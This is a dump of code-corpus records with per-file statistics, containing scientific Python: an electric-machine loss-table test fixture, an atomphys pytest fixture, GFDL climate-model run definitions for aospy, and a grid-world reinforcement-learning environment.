[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0]],
"rotor_eddy": [[9.341, 11.38, 15.2, 17.51, 20.72, 25.78],
[9.344, 10.75, 14.01,
17.45, 23.39, 26.87],
[9.341, 10.1, 12.99,
17.32, 25.55, 24.09],
[9.344, 9.369, 11.88,
16.8, 24.69, 26.68],
[9.341, 8.625, 10.7,
15.26, 26.18, 31.62],
[9.344, 8.098, 10.0,
13.66, 26.79, 32.56],
[9.341, 7.896, 9.607,
13.09, 26.29, 31.62],
[9.344, 8.1, 10.01,
13.65, 26.77, 32.54],
[9.341, 8.631, 10.7,
15.3, 26.22, 31.66],
[9.344, 9.38, 11.9,
16.78, 24.63, 26.67],
[9.341, 10.12, 12.98,
17.29, 25.54, 24.07],
[9.344, 10.77, 14.04,
17.47, 23.37, 26.84],
[9.341, 11.41, 15.11, 17.53, 20.72, 25.68]]}},
{"ex_current": 15.0, "i1": [0.0, 82.0, 164.0, 246.0, 328.0, 410.0],
"beta": [-180.0, -165.0, -150.0, -135.0, -120.0, -105.0, -90.0, -75.0, -60.0, -45.0, -30.0, -15.0, 0.0],
"psid": [[0.08538000000000001, 0.08632, 0.08674000000000001, 0.08568, 0.08360000000000001, 0.08089],
[0.08538000000000001, 0.0841, 0.08291,
0.08068, 0.07744, 0.07309],
[0.08538000000000001, 0.08177, 0.07852,
0.07471, 0.06989999999999999, 0.06288],
[0.08538000000000001, 0.07958,
0.07383, 0.0677, 0.06053, 0.04921],
[0.08538000000000001, 0.07769, 0.06967,
0.06121, 0.05132, 0.035129999999999995],
[0.08538000000000001, 0.07636,
0.06691, 0.0574, 0.04599, 0.02561],
[0.08538000000000001, 0.0759, 0.06608,
0.05631, 0.0442, 0.02215],
[0.08538000000000001, 0.07636, 0.06688,
0.057390000000000004, 0.04598, 0.02561],
[0.08538000000000001, 0.07769, 0.06969,
0.061189999999999994, 0.05141, 0.03511],
[0.08538000000000001, 0.07957,
0.07382000000000001, 0.06769, 0.06052, 0.0492],
[0.08538000000000001, 0.08177, 0.07852,
0.0747, 0.06989000000000001, 0.06286],
[0.08538000000000001, 0.08409, 0.08292,
0.08069, 0.07743, 0.07309],
[0.08538000000000001, 0.08632, 0.08674000000000001, 0.08568, 0.08360000000000001, 0.08089]],
"psiq": [[-0.0, -0.01817, -0.03262, -0.04374, -0.05263, -0.06016],
[-0.0, -0.01727, -0.03172, -0.04368, -
0.053810000000000004, -0.06276],
[-0.0, -0.015220000000000001, -0.028390000000000002, -
0.0402, -0.050980000000000004, -0.06191000000000001],
[-0.0, -0.012219999999999998, -0.02254, -
0.032459999999999996, -0.042230000000000004, -0.05394],
[-0.0, -0.00848, -0.01519, -
0.02162, -0.02855, -0.03774],
[-0.0, -0.0042710000000000005, -
0.007298, -0.01055, -0.0142, -0.01917],
[-0.0, -7.13e-10, -1.1890000000000001e-09, -
1.741e-09, -2.371e-09, -3.221e-09],
[0.0, 0.004275999999999999, 0.007284,
0.01053, 0.0142, 0.01916],
[0.0, 0.008473, 0.01516, 0.02161,
0.02848, 0.037720000000000004],
[0.0, 0.012210000000000002, 0.02253, 0.03243,
0.042210000000000004, 0.053930000000000006],
[0.0, 0.015200000000000002, 0.02837,
0.04022, 0.050960000000000005, 0.06189],
[0.0, 0.01724, 0.03171,
0.043629999999999995, 0.05377, 0.06275],
[0.0, 0.01815, 0.032600000000000004, 0.04371, 0.05264, 0.06014]],
"losses": {"speed": 50.0, "ef": [1.45, 1.45], "hf": [1.0, 1.0],
"styoke_hyst": [[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0]],
"stteeth_hyst": [[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0]],
"styoke_eddy": [[172.6, 182.3, 203.0, 220.5, 232.9, 241.5],
[172.6, 173.6, 187.9,
203.2, 215.8, 224.2],
[172.6, 164.3, 168.1,
177.9, 188.4, 197.0],
[172.6, 156.0, 147.9,
147.1, 150.1, 156.1],
[172.6, 149.3, 132.4,
121.3, 112.4, 108.1],
[172.6, 145.1, 123.2,
104.7, 85.45, 68.8],
[172.6, 143.8, 120.4,
98.86, 75.42, 53.11],
[172.6, 145.1, 123.2,
104.6, 85.42, 68.74],
[172.6, 149.3, 132.4,
121.2, 112.4, 108.0],
[172.6, 156.0, 147.8,
146.9, 150.0, 156.0],
[172.6, 164.3, 168.0,
178.0, 188.3, 196.9],
[172.6, 173.5, 187.9,
203.2, 215.6, 224.2],
[172.6, 182.3, 203.0, 220.4, 233.1, 241.4]],
"stteeth_eddy": [[122.3, 123.8, 131.5, 141.0, 148.3, 151.2],
[122.3, 123.6, 129.2,
136.9, 143.8, 147.6],
[122.3, 123.8, 127.6,
135.2, 144.0, 151.7],
[122.3, 124.6, 128.9,
138.1, 151.8, 169.8],
[122.3, 125.9, 131.7,
140.7, 153.0, 177.7],
[122.3, 127.3, 131.8,
133.8, 136.8, 155.8],
[122.3, 127.8, 130.9,
128.9, 127.5, 141.7],
[122.3, 127.3, 131.9,
133.8, 136.7, 155.7],
[122.3, 125.9, 131.6,
140.6, 152.8, 177.5],
[122.3, 124.6, 128.9,
138.0, 151.7, 169.7],
[122.3, 123.8, 127.5,
135.2, 143.8, 151.4],
[122.3, 123.6, 129.1,
136.8, 143.6, 147.5],
[122.3, 123.7, 131.5, 141.0, 148.6, 151.1]],
"rotor_hyst": [[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0]],
"rotor_eddy": [[10.68, 12.54, 15.17, 17.28, 18.95, 20.42],
[10.68, 11.99, 14.47,
17.12, 19.51, 21.82],
[10.68, 11.4, 13.64,
16.84, 20.53, 25.05],
[10.68, 10.7, 12.63,
16.61, 21.59, 28.27],
[10.68, 9.812, 11.59,
15.2, 21.46, 28.51],
[10.68, 9.266, 10.76,
14.1, 19.6, 27.15],
[10.68, 9.142, 10.49,
13.97, 19.39, 26.63],
[10.68, 9.213, 10.61,
14.07, 19.62, 27.14],
[10.68, 9.836, 11.59,
15.14, 20.8, 28.45],
[10.68, 10.61, 12.58,
16.6, 21.58, 28.23],
[10.68, 11.52, 13.67,
16.88, 20.49, 25.0],
[10.68, 12.06, 14.5,
17.56, 19.53, 21.85],
[10.68, 12.57, 15.18, 17.33, 18.99, 20.43]]}}]}
return femagtools.machine.sm.SynchronousMachine(smpars)
def test_sm(sm):
u1 = 230
f1 = 50
iqdf = sm.iqd_torque(120)
assert pytest.approx(iqdf, rel=0.01) == [271.5, -45.31, 5.4]
| 73.126095
| 123
| 0.251311
| 9,341
| 83,510
| 2.241088
| 0.117011
| 0.329703
| 0.476498
| 0.613929
| 0.517722
| 0.434174
| 0.421515
| 0.343222
| 0.331231
| 0.296217
| 0
| 0.610845
| 0.607795
| 83,510
| 1,141
| 124
| 73.190184
| 0.028303
| 0
| 0
| 0.328056
| 0
| 0
| 0.009113
| 0
| 0
| 0
| 0
| 0
| 0.00088
| 1
| 0.001759
| false
| 0
| 0.003518
| 0
| 0.006157
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
a03ed9501ed65d2386151942d8dce042f05f393c
| 113
|
py
|
Python
|
tests/conftest.py
|
mgrau/atomphys
|
8624748eb61a2c6e1f70a5784a9d3fc242ff50b1
|
[
"MIT"
] | 3
|
2021-10-07T11:33:43.000Z
|
2022-03-16T13:27:17.000Z
|
tests/conftest.py
|
mgrau/atomphys
|
8624748eb61a2c6e1f70a5784a9d3fc242ff50b1
|
[
"MIT"
] | 2
|
2021-10-07T14:49:36.000Z
|
2021-10-21T20:36:36.000Z
|
tests/conftest.py
|
mgrau/atomphys
|
8624748eb61a2c6e1f70a5784a9d3fc242ff50b1
|
[
"MIT"
] | null | null | null |
import pytest
from atomphys import Atom
@pytest.fixture(scope="module")
def rubidium():
return Atom("Rb")
| 12.555556
| 31
| 0.716814
| 15
| 113
| 5.4
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.159292
| 113
| 8
| 32
| 14.125
| 0.852632
| 0
| 0
| 0
| 0
| 0
| 0.070796
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.2
| true
| 0
| 0.4
| 0.2
| 0.8
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 6
|
a07a0edfe24d8614d2f8e66fce437442943c42b6
| 235
|
py
|
Python
|
interage/api/managers/__init__.py
|
IntMed/interage_python_sdk
|
70ea7d0b850c7664113210a18305a0fcffe5ed7f
|
[
"MIT"
] | 1
|
2017-03-02T11:47:32.000Z
|
2017-03-02T11:47:32.000Z
|
interage/api/managers/__init__.py
|
weynelucas/interage_python_sdk
|
70ea7d0b850c7664113210a18305a0fcffe5ed7f
|
[
"MIT"
] | null | null | null |
interage/api/managers/__init__.py
|
weynelucas/interage_python_sdk
|
70ea7d0b850c7664113210a18305a0fcffe5ed7f
|
[
"MIT"
] | null | null | null |
from .base import APIManager
from .managers import (InteracaoAPIManager, PrincipioAtivoAPIManager, MedicamentoAPIManager)
__all__ = [
'APIManager',
'InteracaoAPIManager', 'PrincipioAtivoAPIManager', 'MedicamentoAPIManager',
]
| 29.375
| 92
| 0.795745
| 15
| 235
| 12.2
| 0.6
| 0.469945
| 0.699454
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.114894
| 235
| 7
| 93
| 33.571429
| 0.879808
| 0
| 0
| 0
| 0
| 0
| 0.314894
| 0.191489
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.333333
| 0
| 0.333333
| 0
| 1
| 0
| 1
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 6
|
a091c5fa076cabb5a88c655a96b60dfb213ac029
| 8,778
|
py
|
Python
|
aospy_user/runs/gfdl_runs.py
|
spencerahill/aospy-obj-lib
|
76803806e8c6b0042c901735eed1c88042d4e4ed
|
[
"Apache-2.0"
] | 3
|
2015-10-27T19:32:17.000Z
|
2021-05-07T12:41:30.000Z
|
aospy_user/runs/gfdl_runs.py
|
spencerahill/aospy-obj-lib
|
76803806e8c6b0042c901735eed1c88042d4e4ed
|
[
"Apache-2.0"
] | 11
|
2015-09-25T15:45:59.000Z
|
2020-03-31T13:50:29.000Z
|
aospy_user/runs/gfdl_runs.py
|
spencerahill/aospy-obj-lib
|
76803806e8c6b0042c901735eed1c88042d4e4ed
|
[
"Apache-2.0"
] | null | null | null |
"""aospy.Run objects for simulations from various GFDL models."""
import datetime
from aospy import Run
from aospy.data_loader import GFDLDataLoader
# SM2.1
sm2_cont = Run(
name='cont',
data_loader=GFDLDataLoader(
data_direc=('/archive/Yi.Ming/sm2.1_fixed/SM2.1U_Control-1860_lm2_aie'
'_rerun6.YIM/pp'),
data_dur=20,
data_start_date=datetime.datetime(1, 1, 1),
data_end_date=datetime.datetime(120, 12, 31),
),
)
sm2_aero = Run(
name='aero',
data_loader=GFDLDataLoader(
data_direc=('/archive/Yi.Ming/sm2.1_fixed/SM2.1U_Control-1860_lm2_aie2'
'_rerun6.YIM/pp'),
data_dur=100,
data_start_date=datetime.datetime(1, 1, 1),
data_end_date=datetime.datetime(100, 12, 31),
),
)
sm2_gas = Run(
name='gas',
data_loader=GFDLDataLoader(
data_direc=('/archive/Yi.Ming/sm2.1_fixed/SM2.1U_Control-1860_lm2_aie3'
'_rerun8.YIM/pp'),
data_dur=5,
data_start_date=datetime.datetime(1, 1, 1),
data_end_date=datetime.datetime(80, 12, 31),
),
)
sm2_both = Run(
name='both',
data_loader=GFDLDataLoader(
data_direc=('/archive/Yi.Ming/sm2.1_fixed/SM2.1U_Control-1860_lm2_aie4'
'_rerun6.YIM/pp'),
data_dur=100,
data_start_date=datetime.datetime(1, 1, 1),
data_end_date=datetime.datetime(100, 12, 31),
),
)
# c48-HiRAM
hiram_c48_0 = Run(
name='ming0',
data_loader=GFDLDataLoader(
data_direc=('/archive/Ming.Zhao/hiramdp/siena_201204/c48l32_him_X0/'
'gfdl.ncrc2-intel-prod/pp'),
data_start_date=datetime.datetime(1981, 1, 1),
data_end_date=datetime.datetime(1995, 12, 31),
),
)
hiram_c48_0_p2K = Run(
name='ming0_p2K',
data_loader=GFDLDataLoader(
template=hiram_c48_0.data_loader,
data_direc=('/archive/Ming.Zhao/hiramdp/siena_201204/c48l32_him_X0'
'_p2K/gfdl.ncrc2-intel-prod/pp'),
),
)
hiram_c48_1 = Run(
name='ming1',
data_loader=GFDLDataLoader(
template=hiram_c48_0.data_loader,
data_direc=('/archive/Ming.Zhao/hiramdp/siena_201204/c48l32_him_X0b/'
'gfdl.ncrc2-intel-prod/pp'),
),
)
hiram_c48_1_p2K = Run(
name='ming1_p2K',
data_loader=GFDLDataLoader(
template=hiram_c48_0.data_loader,
data_direc=('/archive/Ming.Zhao/hiramdp/siena_201204/'
'c48l32_him_X0b_p2K/gfdl.ncrc2-intel-prod/pp'),
),
)
hiram_c48_2 = Run(
name='ming2',
data_loader=GFDLDataLoader(
template=hiram_c48_0.data_loader,
data_direc=('/archive/Ming.Zhao/hiramdp/siena_201204/c48l32_him_X0e/'
'gfdl.ncrc2-intel-prod/pp'),
),
)
hiram_c48_2_p2K = Run(
name='ming2_p2K',
data_loader=GFDLDataLoader(
template=hiram_c48_0.data_loader,
data_direc=('/archive/Ming.Zhao/hiramdp/siena_201204/'
'c48l32_him_X0e_p2K/gfdl.ncrc2-intel-prod/pp'),
),
)
hiram_c48_3 = Run(
name='ming3',
data_loader=GFDLDataLoader(
template=hiram_c48_0.data_loader,
data_direc=('/archive/Ming.Zhao/hiramdp/siena_201204/c48l32_him_X0f/'
'gfdl.ncrc2-intel-prod/pp'),
),
)
hiram_c48_3_p2K = Run(
name='ming3_p2K',
data_loader=GFDLDataLoader(
template=hiram_c48_0.data_loader,
data_direc=('/archive/Ming.Zhao/hiramdp/siena_201204/'
'c48l32_him_X0f_p2K/gfdl.ncrc2-intel-prod/pp'),
),
)
hiram_c48_4 = Run(
name='ming4',
data_loader=GFDLDataLoader(
template=hiram_c48_0.data_loader,
data_direc=('/archive/Ming.Zhao/hiramdp/siena_201204/c48l32_him_X0c/'
'gfdl.ncrc2-intel-prod/pp'),
),
)
hiram_c48_4_p2K = Run(
name='ming4_p2K',
data_loader=GFDLDataLoader(
template=hiram_c48_0.data_loader,
data_direc=('/archive/Ming.Zhao/hiramdp/siena_201204/'
'c48l32_him_X0c_p2K/gfdl.ncrc2-intel-prod/pp'),
),
)
hiram_c48_5 = Run(
name='ming5',
data_loader=GFDLDataLoader(
template=hiram_c48_0.data_loader,
data_direc=('/archive/Ming.Zhao/hiramdp/siena_201204/c48l32_him_X01/'
'gfdl.ncrc2-intel-prod/pp'),
),
)
hiram_c48_5_p2K = Run(
name='ming5_p2K',
data_loader=GFDLDataLoader(
template=hiram_c48_0.data_loader,
data_direc=('/archive/Ming.Zhao/hiramdp/siena_201204/'
'c48l32_him_X01_p2K/gfdl.ncrc2-intel-prod/pp'),
),
)
hiram_c48_6 = Run(
name='ming6',
data_loader=GFDLDataLoader(
template=hiram_c48_0.data_loader,
data_direc=('/archive/Ming.Zhao/hiramdp/siena_201204/c48l32_him_X02/'
'gfdl.ncrc2-intel-prod/pp'),
),
)
hiram_c48_6_p2K = Run(
name='ming6_p2K',
data_loader=GFDLDataLoader(
template=hiram_c48_0.data_loader,
data_direc=('/archive/Ming.Zhao/hiramdp/siena_201204/'
'c48l32_him_X02_p2K/gfdl.ncrc2-intel-prod/pp'),
),
)
hiram_c48_7 = Run(
name='ming7',
data_loader=GFDLDataLoader(
template=hiram_c48_0.data_loader,
data_direc=('/archive/Ming.Zhao/hiramdp/siena_201204/c48l32_him_X03/'
'gfdl.ncrc2-intel-prod/pp'),
),
)
hiram_c48_7_p2K = Run(
name='ming7_p2K',
data_loader=GFDLDataLoader(
template=hiram_c48_0.data_loader,
data_direc=('/archive/Ming.Zhao/hiramdp/siena_201204/'
'c48l32_him_X03_p2K/gfdl.ncrc2-intel-prod/pp'),
),
)
hiram_c48_8 = Run(
name='ming8',
data_loader=GFDLDataLoader(
template=hiram_c48_0.data_loader,
data_direc=('/archive/Ming.Zhao/hiramdp/siena_201204/c48l32_him_X04/'
'gfdl.ncrc2-intel-prod/pp'),
),
)
hiram_c48_8_p2K = Run(
name='ming8_p2K',
data_loader=GFDLDataLoader(
template=hiram_c48_0.data_loader,
data_direc=('/archive/Ming.Zhao/hiramdp/siena_201204/'
'c48l32_him_X04_p2K/gfdl.ncrc2-intel-prod/pp'),
),
)
# AM3_c90
am3c90_cont = Run(
name='cont',
data_loader=GFDLDataLoader(
data_direc=('/archive/h1g/FMS/siena_201203/c90L48_am3p10_v6_clim/'
'gfdl.ncrc2-intel-prod-openmp/pp'),
data_start_date=datetime.datetime(1981, 1, 1),
data_end_date=datetime.datetime(1990, 12, 31),
),
)
am3c90_p2K = Run(
name='p2K',
data_loader=GFDLDataLoader(
data_direc=('/archive/h1g/FMS/siena_201203/c90L48_am3p10_v6_clim_p2k/'
'gfdl.ncrc2-intel-prod-openmp/pp'),
data_start_date=datetime.datetime(1981, 1, 1),
data_end_date=datetime.datetime(1990, 12, 31),
),
)
# AM2.5
am2p5_cont = Run(
name='cont',
data_loader=GFDLDataLoader(
data_direc=('/archive/miz/hiramdp/siena_201204/c180l32_am2_C0/'
'gfdl.ncrc2-intel-prod/pp'),
data_dur=10,
data_start_date=datetime.datetime(1981, 1, 1),
data_end_date=datetime.datetime(2000, 12, 31),
),
)
am2p5_p2K = Run(
name='p2K',
data_loader=GFDLDataLoader(
data_direc=('/archive/miz/hiramdp/siena_201204/c180l32_am2_C0_p2K/'
'gfdl.ncrc2-intel-prod/pp'),
data_dur=10,
data_start_date=datetime.datetime(1981, 1, 1),
data_end_date=datetime.datetime(2000, 12, 31),
),
)
# AM4 prototypes
am4_a1c = Run(
name='cont',
data_loader=GFDLDataLoader(
data_direc=('/archive/Ming.Zhao/awg/tikal_201403/c96L48_am4a1_'
'2000climo_highsen1/gfdl.ncrc2-intel-prod-openmp/pp'),
),
)
am4_a1p2k = Run(
name='+2K',
data_loader=GFDLDataLoader(
data_direc=('/archive/Ming.Zhao/awg/tikal_201403/c96L48_am4a1_'
'2000climo_highsen1_p2K/gfdl.ncrc2-intel-prod-openmp/pp'),
),
)
am4_a2c = Run(
name='cont',
data_loader=GFDLDataLoader(
data_direc=('/archive/cjg/awg/tikal_201403/c96L48_am4a2r1_'
'2000climo/gfdl.ncrc2-intel-prod-openmp/pp'),
),
)
am4_a2p2k = Run(
name='+2K',
data_loader=GFDLDataLoader(
data_direc=('/archive/cjg/awg/tikal_201403/c96L48_am4a2r1_'
'2000climo_p2K/gfdl.ncrc2-intel-prod-openmp/pp'),
),
)
am4_c1c = Run(
name='cont',
data_loader=GFDLDataLoader(
data_direc=('/archive/miz/tikal_201409_awgUpdates_mom6_2014.08.29/'
'c96L48_am4c1r2_2000climo/'
'gfdl.ncrc2-intel-prod-openmp/pp'),
),
)
am4_c1p2k = Run(
name='+2K',
data_loader=GFDLDataLoader(
data_direc=('/archive/miz/tikal_201409_awgUpdates_mom6_2014.08.29/'
'c96L48_am4c1r2_2000climo_p2K/gfdl.ncrc2-intel-prod-'
'openmp/pp'),
),
)
| 31.017668
| 79
| 0.63306
| 1,129
| 8,778
| 4.607617
| 0.117803
| 0.096117
| 0.147636
| 0.096886
| 0.888889
| 0.885429
| 0.87697
| 0.870819
| 0.743368
| 0.733948
| 0
| 0.115339
| 0.233538
| 8,778
| 282
| 80
| 31.12766
| 0.657848
| 0.011962
| 0
| 0.525926
| 0
| 0
| 0.327254
| 0.299434
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.011111
| 0
| 0.011111
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
a09ae054433e28a292f4a34248304c8ad9acb4c3
| 4,332
|
py
|
Python
|
Reinforcement Learning/grid_world.py
|
jakelong0509/master
|
0507a796d0c40d5b28e54f162e5639ddfe2d1c2a
|
[
"MIT"
] | null | null | null |
Reinforcement Learning/grid_world.py
|
jakelong0509/master
|
0507a796d0c40d5b28e54f162e5639ddfe2d1c2a
|
[
"MIT"
] | null | null | null |
Reinforcement Learning/grid_world.py
|
jakelong0509/master
|
0507a796d0c40d5b28e54f162e5639ddfe2d1c2a
|
[
"MIT"
] | null | null | null |
"""import numpy as np
import matplotlib.pyplot as plt
class Grid:
def __init__(self, height, weight, start):
self.height = height
self.weight = weight
self.i = start[0]
self.j = start[1]
def set(self, rewards, actions):
self.rewards = rewards
self.actions = actions
def set_state(self, s):
self.i = s[0]
self.j = s[1]
def current_state(self):
return (self.i, self.j)
def is_terminal(self, s):
return s not in self.actions
def move(self, action):
if action in self.actions[(self.i, self.j)]:
if action == 'U':
self.i -= 1
if action == "D":
self.i += 1
if action == "R":
self.j += 1
if action == "L":
self.j -= 1
return self.rewards.get((self.i, self.j), 0)
def undo_move(self, action):
if action == 'U':
self.i += 1
if action == 'D':
self.i -= 1
if action == 'R':
self.j -= 1
if action == 'L':
self.j += 1
assert(self.current_state in self.all_states)
def game_over(self):
return (self.i, self.j) not in self.actions
def all_states(self):
return set(self.actions.keys()) | set(self.rewards.keys())
def standard_grid():
g = Grid(3, 4, (0,2))
rewards = {(0,3) : 1, (1,3) : -1}
actions = {
(0, 0): ('D', 'R'),
(0, 1): ('L', 'R'),
(0, 2): ('L', 'D', 'R'),
(1, 0): ('U', 'D'),
(1, 2): ('U', 'D', 'R'),
(2, 0): ('U', 'R'),
(2, 1): ('L', 'R'),
(2, 2): ('L', 'R', 'U'),
(2, 3): ('L', 'U'),
}
g.set(rewards, actions)
return g
def negative_grid(step_cost = -0.1):
g = standard_grid()
g.rewards.update({
(0, 0): step_cost,
(0, 1): step_cost,
(0, 2): step_cost,
(1, 0): step_cost,
(1, 2): step_cost,
(2, 0): step_cost,
(2, 1): step_cost,
(2, 2): step_cost,
(2, 3): step_cost,
})
return g
"""
class Grid: #Environment
def __init__(self, width, height, start):
self.height = height
self.width = width
self.i = start[0]
self.j = start[1]
def set(self, rewards , actions):
self.rewards = rewards
self.actions = actions
def set_state(self, s):
self.i = s[0]
self.j = s[1]
def current_state(self):
return (self.i, self.j)
def game_over(self):
return (self.i, self.j) not in self.actions
def is_terminal(self, s):
return s not in self.actions
def move(self, action):
if action in self.actions[(self.i, self.j)]:
if action == 'U':
self.i -= 1
if action == 'D':
self.i += 1
if action == 'R':
self.j += 1
if action == 'L':
self.j -= 1
return self.rewards.get((self.i, self.j), 0)
def undo_move(self, action):
if action == 'U':
self.i += 1
if action == 'D':
self.i -= 1
if action == 'R':
self.j -= 1
if action == 'L':
self.j += 1
assert(self.current_state in self.all_states)
def all_states(self):
return set(self.actions.keys()) | set(self.rewards.keys())
def standard_grid():
g = Grid(3, 4, (2,0))
rewards = {(0,3) : 1, (1,3) : -1}
actions = {
(0, 0): ('D', 'R'),
(0, 1): ('L', 'R'),
(0, 2): ('L', 'D', 'R'),
(1, 0): ('U', 'D'),
(1, 2): ('U', 'D', 'R'),
(2, 0): ('U', 'R'),
(2, 1): ('L', 'R'),
(2, 2): ('L', 'R', 'U'),
(2, 3): ('L', 'U'),
}
g.set(rewards, actions)
return g
def negative_grid(step_cost = -0.1):
g = standard_grid()
g.rewards.update({
(0, 0): step_cost,
(0, 1): step_cost,
(0, 2): step_cost,
(1, 0): step_cost,
(1, 2): step_cost,
(2, 0): step_cost,
(2, 1): step_cost,
(2, 2): step_cost,
(2, 3): step_cost,
})
return g
| 25.482353
| 67
| 0.427516
| 586
| 4,332
| 3.075085
| 0.095563
| 0.055494
| 0.059933
| 0.044395
| 0.921199
| 0.893452
| 0.893452
| 0.893452
| 0.893452
| 0.893452
| 0
| 0.046529
| 0.394737
| 4,332
| 169
| 68
| 25.633136
| 0.640732
| 0.482456
| 0
| 0.253521
| 0
| 0
| 0.014037
| 0
| 0
| 0
| 0
| 0
| 0.014085
| 1
| 0.15493
| false
| 0
| 0
| 0.056338
| 0.267606
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
261a6512c03ec6c0a8df024482454299e770ae00
| 30
|
py
|
Python
|
src/nvim/testdir/pyxfile/pyx.py
|
uga-rosa/neovim
|
afbf89dc0120b1db5782a0bf807dc7c8db70ccf6
|
[
"Vim"
] | 48,021
|
2015-01-01T07:55:49.000Z
|
2022-03-31T23:54:18.000Z
|
src/nvim/testdir/pyxfile/pyx.py
|
uga-rosa/neovim
|
afbf89dc0120b1db5782a0bf807dc7c8db70ccf6
|
[
"Vim"
] | 13,385
|
2015-01-01T05:24:41.000Z
|
2022-03-31T22:59:21.000Z
|
src/nvim/testdir/pyxfile/pyx.py
|
uga-rosa/neovim
|
afbf89dc0120b1db5782a0bf807dc7c8db70ccf6
|
[
"Vim"
] | 5,282
|
2015-01-02T08:22:32.000Z
|
2022-03-31T14:33:22.000Z
|
import sys
print(sys.version)
| 10
| 18
| 0.8
| 5
| 30
| 4.8
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.1
| 30
| 2
| 19
| 15
| 0.888889
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0.5
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
|
0
| 6
|
cd24ef7bb022cb5344f4779e07050be2e6b406ce
| 26
|
py
|
Python
|
Data_loader/__init__.py
|
Gorilla-Lab-SCUT/OrthDNNs
|
